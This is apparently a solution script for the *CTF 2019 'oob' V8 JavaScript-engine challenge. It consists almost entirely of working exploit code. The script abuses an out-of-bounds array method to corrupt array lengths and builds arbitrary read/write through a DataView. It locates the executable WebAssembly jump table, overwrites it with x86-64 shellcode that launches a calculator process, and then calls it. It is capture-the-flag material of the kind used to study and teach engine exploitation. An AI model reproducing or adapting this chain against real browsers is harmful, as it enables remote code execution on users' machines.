*CTF 2019 oob/pwn.js

let ab = new ArrayBuffer(8);
let farray = new Float64Array(ab);
let uarray = new Uint32Array(ab);
let wasm_code = new Uint8Array([0x0,0x61,0x73,0x6D,0x01,0x0,0x0,0x0,0x01,0x85,0x80,0x80,0x80,0x0,0x01,0x60,0x0,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x0,0x01,0x0,0x04,0x84,0x80,0x80,0x80,0x0,0x01,0x70,0x0,0x0,0x05,0x83,0x80,0x80,0x80,0x0,0x01,0x0,0x01,0x06,0x81,0x80,0x80,0x80,0x0,0x0,0x07,0x91,0x80,0x80,0x80,0x0,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x0,0x04,0x6D,0x61,0x69,0x6E,0x0,0x0,0x0A,0x8A,0x80,0x80,0x80,0x0,0x01,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x01,0x0B]);
let shellcode = [0xbb48c031, 0x91969dd1, 0xff978cd0, 0x53dbf748, 0x52995f54, 0xb05e5457, 0x50f3b];

function f2i(f) {
         farray[0] = f;
         return [uarray[0],uarray[1]]
}

function i2f(lo,hi) {
         uarray[0] = lo;
         uarray[1] = hi;
         return farray[0];
}

function hex(lo,hi) {
   document.write('0x' + hi.toString(16) + lo.toString(16)+'<br>');
}


function pause() {
   while(1){;}
}
function f() {
   let sc = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00]; 
   
   let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code),{})
   let f2 = wasm_mod.exports.main
   let a = [1,2,3];
   let b = [4,5,6];
   b[100000] = 0x41414141;
   let c = [1.1,1.2,1.3,1.4,1.5,1.6];
   let ab2 = new ArrayBuffer(0x100);
   let f_arr = [f2];
   let dv = new DataView(ab2);

   for(var i = 0; i < 10; i++)
      document.write('STARTTTTTTTTTTTTT'+'<br>');
   document.write(b.oob);

   for(var i = 30; i < 200; i++) {
      b.length = i;
      if(f2i(b.oob())[1] == 6) {
         document.write('<br>'+i+'<br>');
         b.oob(i2f(0x0,0x43434343));
         break;
      }
   }
   if(c.length != 0x43434343) {
      document.write('length set error'+'<br>');
   }   
   let f_addr = f2i(c[25]);
   hex(f_addr[0],f_addr[1]);
   c[10] = i2f(f_addr[0]-1,f_addr[1]);

   let temp = [dv.getUint32(24,true), dv.getUint32(28,true)]; //shared_info
   hex(temp[0]-1,temp[1]);

   c[10] = i2f((temp[0]-1),temp[1]);

   temp = [dv.getUint32(8,true), dv.getUint32(12,true)]; //WASM_EXPORTED_FUNCTION_DATA_TYPE 
   hex(temp[0]-1,temp[1]);
   c[10] = i2f((temp[0]-1),temp[1]);

   temp = [dv.getUint32(16,true), dv.getUint32(20,true)]; //WASM_INSTANCE_TYPE 
   hex(temp[0]-1,temp[1]);
   c[10] = i2f((temp[0]-1),temp[1]);

   temp = [dv.getUint32(136,true), dv.getUint32(140,true)]; //JumpTableStart
   hex(temp[0],temp[1]);
   c[10] = i2f((temp[0]),temp[1]);

   let len_save  = [temp[0].toString(16).length,temp[1].toString(16).length];
   document.write(len_save);

   
   for(let i=0; i<sc.length; i++)
      dv.setUint8(i,sc[i],true);

   document.write('f2 call !!!'+'<br>');
   f2();
   

}

f();